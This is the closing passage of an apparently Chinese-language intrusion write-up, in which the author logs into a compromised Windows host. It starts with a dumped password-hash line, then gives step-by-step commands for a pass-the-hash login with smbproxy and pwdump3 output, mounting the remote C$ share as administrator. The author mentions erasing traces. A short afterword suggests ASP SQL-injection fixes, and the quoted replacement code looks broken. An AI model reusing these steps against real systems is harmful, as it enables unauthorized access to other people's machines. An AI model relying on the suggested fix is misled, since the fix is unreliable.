TsInternetUser:1000:1987DC7B3DE4A42761541729CD9CDFDD:28212D01DDEF0A91BA9022173515E9A6:::
…………………………
转换完毕
1. 停掉本机server服务,因为此程序默认使用127.0.0.1的139端口
net stop server
2. 运行本程序
smbproxy -s target -f pwdump3.txt 好了
3. 通过本地代理登陆远程主机
net use * \\127.0.0.1\c$ 123456/user:administrator
哈!成功!
其实,不用SMBProxy也只不过是为了快一点登录,使用LC4破解也是可行的,主要还是因为我很懒……
擦出了痕迹,归还了权限,我就撤退了,呵呵!
后记:关于ASP漏洞的补救,我不是很在行,只是提一些建议吧!
将user = Trim(Request(“user”))改为user = Replace(Trim(Request(“user”)),” ”,” ’ ”) 以实现 ” ‘ ” 的过滤(被替换为空格)。
数据库的下载是我猜解的,但是有这样的一种方法是绝对可行的。ASP使用一个连接文件将数据导入数据库文件这个文件一般以inc为扩展名,而且一般命名为conn.inc如果将它下载下来,就意味着数据库路径的暴露,所以要将conn..inc改为asp后缀,同时把数据库文件也改为asp扩展名并修改连接文件中的相关语句。
对于上传文件限制的代码,我就不太懂了,不过有很多资料啊!
其实系统的安全只不过是站点安全的一个重要组成部分,服务程序(web页面)的漏洞也会导致系统安全防线的崩溃,这次渗透功击就是一个例子。
相关文章
 我来说两句 |
对此文章发表了评论 |
评论列表 (最新 评论仅限网友观点!)
推荐文章
